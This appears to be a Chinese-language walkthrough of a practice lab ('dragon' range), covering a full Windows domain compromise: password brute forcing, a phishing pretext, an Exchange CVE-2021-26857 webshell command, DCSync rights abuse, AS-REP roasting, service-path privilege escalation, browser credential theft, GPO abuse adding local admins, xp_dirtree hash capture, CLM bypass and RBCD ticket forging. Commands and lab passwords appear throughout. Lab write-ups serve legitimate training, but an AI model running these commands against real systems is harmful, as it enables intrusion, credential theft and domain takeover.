dragon 靶场WP
靶场搭建:
https://github.com/0range-x/dragon-lab
ws01-owa钓鱼
扫描结果

ftp匿名上传

制作用户名字典

构造字典msf爆破成功,字典用的rockyou.txt
成功登录
1 | gaohexie/sweetpea#1 |


构造话术
1 | 关于自测钓鱼后门的通知 |


ws02-exchange rce
cve-2021-26857

成功写入shell

1 | command=Response.Write(new%20ActiveXObject("Wscript.Shell").exec("whoami").Stdout.ReadAll()); |

python 开启web服务 下载木马上线


成功上线system

定位域控


1 | Add-DomainObjectAcl -TargetIdentity "DC=haishitest,DC=lab" -PrincipalIdentity gaohexie -Rights DCSync |
导入powerview

添加普通用户dcsync权限

winrm登录

执行上线

抓到liaide的密码,该用户拥有dcsync权限,直接dcsync
ws04- as_rep

发现maluzi用户存在as_rep
制作行为习惯字典
https://github.com/bigb0sss/goPassGen
生成字典

爆破成功

成功登录ws04机器

发现xmanager目录

上传解密工具
抓到密码

ws05-空路径提权+dpapi解密
winrm登录服务器

先上线cs

3389远程连接

查找可以服务提权的路径

查看该服务

停止该服务

修改配置文件并启动上线


1 | C:\Program Files (x86)\AnyDesk\AnyDesk.exe --service |
提权成功

cs不稳定 反弹到nc

上传解密工具
谷歌浏览器解密工具
https://github.com/moonD4rk/HackBrowserData/releases/tag/v0.4.3


注入到administrator进程

抓取成功

读取密码

1 | zhaolinlu:tEKO4f4CQ1BPPz~LQm |
ws06-08-GPO批量上线
1 | C:\Users\zhaolinlu\Desktop>StandIn_v13_Net45.exe --gpo --filter work --acl |

建立计划任务
1 | StandIn_v13_Net45.exe --gpo --filter work --tasktype computer --taskname task01 --author "haishi\Administrator" --command "powershell.exe /c" --args "net localgroup 'administrators' zhaolinlu /add" |
https://github.com/rootSySdk/PowerGPOAbuse
1 | Add-GPOGroupMember -Member 'zhaolinlu' -GPOIdentity 'work' |

同样的方式在ws08机器上发现mssql的sa账号密码

sql01-xp_cmd 监听hash
登录成功

执行xp_dirtree,监听得到hash
1 | EXEC master.sys.xp_dirtree '\\192.168.200.15\simblog.txt',0,1; |


拿到mssql服务账户的hash

使用大字典rockyou.txt爆破出密码

1 | wuxinqi:xxotisxx14. |
sql02-tv接管
3389成功登录该机器

发现该机器有tv,同时连接着 192.168.201.100这台机器

而且桌面保存着密码

连接成功

ws09- clm限制
发现cmd被禁用

发现很多命令被禁用

同时powershell被设置为 clm 语言模式

同时发现该目录无法执行exe
切换一个白目录
bypass clm
https://hackmd.io/@0xbc000/B1pNFIuP_
限制目录执行exe
发现rbcd的用户


1 | husungeng:X9NNkYTMp9jA2vKHXXI |
ws12-rbcd接管exchange
生成机器账号
1 | SharpAllowedToAct.exe -m husungeng -p X9NNkYTMp9jA2vKHXXI -t ws12 -a 192.168.200.2 haishi.lab |
获取服务票据
1 | python getST.py -dc-ip 192.168.200.2 haishi/husungeng:X9NNkYTMp9jA2vKHXXI -spn cifs/ws12.haishi.lab -impersonate administrator |
导入票据
1 | export KRB5CCNAME=administrator.ccache |
getshell
1 | python3 smbexec.py -no-pass -k ws12.haishi.lab |
